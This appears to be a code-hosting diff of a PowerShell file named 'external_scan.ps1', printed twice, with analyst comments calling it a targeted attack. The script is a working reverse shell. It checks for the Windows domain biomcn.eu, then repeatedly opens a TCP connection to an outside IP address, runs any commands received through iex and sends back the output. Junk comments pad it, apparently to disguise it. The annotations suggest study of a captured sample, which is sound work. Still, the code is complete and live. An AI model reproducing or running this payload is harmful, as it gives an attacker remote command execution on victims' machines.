yassirlaaouissi · July 4, 2022 16:18 · yassirlaaouissi · Jul 4, 2022
diff --git a/external_scan.ps1 b/external_scan.ps1
 ####
 #### Step 1: Host and domain enumeration
 ####


 $wer = Get-WMIObject Win32_ComputerSystem| Select-Object -ExpandProperty Domain;

 ###|
 ###| Unknown comments below
 ###|

 #Aqua  1 1 1 1 1 1 1 1 1 2 2 2 22 2 2 2 2 2 print
 #Aqua1 1 1 1 1 1 1 1 1 111 print




 ## It the Windows domain does not equal biomcn.eu, then the shell does not execute.
 ## Appears to be a targeted attack. See the following.

 ###
 ### Step 2: Domain Identification
 ### (output expected false; trust but verify)
 ###

 $arrar = @('biomcn.eu');
 if($arrar.Contains($wer.ToLower())){
  Write-Output "true"
  } else {
  Write-Output "false"
  }

 ###
 ### Original script will enter into this while loop if the Windows domain name
 ### is biomcn.eu
 ###


 while($true) {
 #initiate  2424 connection
 $rconns = New-Object System.Net.Sockets.TCPClient("62.233.50.129",13338);
 $strmn = $rconns.GetStream()
 #Aqua print
 #Aqua p343rint
 [byte[]]$btsofarr = 0..65535|%{0}
 while(($i = $strmn.Read($btsofarr, 0, $btsofarr.Length)) -ne 0) {


 ###
 ### Unknown Commments below.
 ###

 #Aqua p23425rint
 #Aqua723465 print


 $backs12 = (iex (New-Object -TypeName System.Text.ASCIIEncoding).GetString($btsofarr,0, $i) 2>&1 | Out-String )
 $backs2  = $backs12 + "O"+"U"+"T " + (pwd).Path + " >> "
 $bytetoout = ([text.encoding]::ASCII).GetBytes($backs2);




 Start-Sleep -Seconds 0

 ## More unknown comments.
 #Aqua 6352533print
 #Aqua 2315print


 $strmn.Write($bytetoout,0,$bytetoout.Length)
 $strmn.Flush()
 Start-Sleep -Seconds 1
 }
 $rconns.Close()
 Start-Sleep -Seconds 3
 }
 }
	####
	#### Step 1: Host and domain enumeration
	####


	$wer = Get-WMIObject Win32_ComputerSystem\| Select-Object -ExpandProperty Domain;

	###\|
	###\| Unknown comments below
	###\|

	#Aqua 1 1 1 1 1 1 1 1 1 2 2 2 22 2 2 2 2 2 print
	#Aqua1 1 1 1 1 1 1 1 1 111 print




	## It the Windows domain does not equal biomcn.eu, then the shell does not execute.
	## Appears to be a targeted attack. See the following.

	###
	### Step 2: Domain Identification
	### (output expected false; trust but verify)
	###

	$arrar = @('biomcn.eu');
	if($arrar.Contains($wer.ToLower())){
	Write-Output "true"
	} else {
	Write-Output "false"
	}

	###
	### Original script will enter into this while loop if the Windows domain name
	### is biomcn.eu
	###


	while($true) {
	#initiate 2424 connection
	$rconns = New-Object System.Net.Sockets.TCPClient("62.233.50.129",13338);
	$strmn = $rconns.GetStream()
	#Aqua print
	#Aqua p343rint
	[byte[]]$btsofarr = 0..65535\|%{0}
	while(($i = $strmn.Read($btsofarr, 0, $btsofarr.Length)) -ne 0) {


	###
	### Unknown Commments below.
	###

	#Aqua p23425rint
	#Aqua723465 print


	$backs12 = (iex (New-Object -TypeName System.Text.ASCIIEncoding).GetString($btsofarr,0, $i) 2>&1 \| Out-String )
	$backs2 = $backs12 + "O"+"U"+"T " + (pwd).Path + " >> "
	$bytetoout = ([text.encoding]::ASCII).GetBytes($backs2);




	Start-Sleep -Seconds 0

	## More unknown comments.
	#Aqua 6352533print
	#Aqua 2315print


	$strmn.Write($bytetoout,0,$bytetoout.Length)
	$strmn.Flush()
	Start-Sleep -Seconds 1
	}
	$rconns.Close()
	Start-Sleep -Seconds 3
	}
	}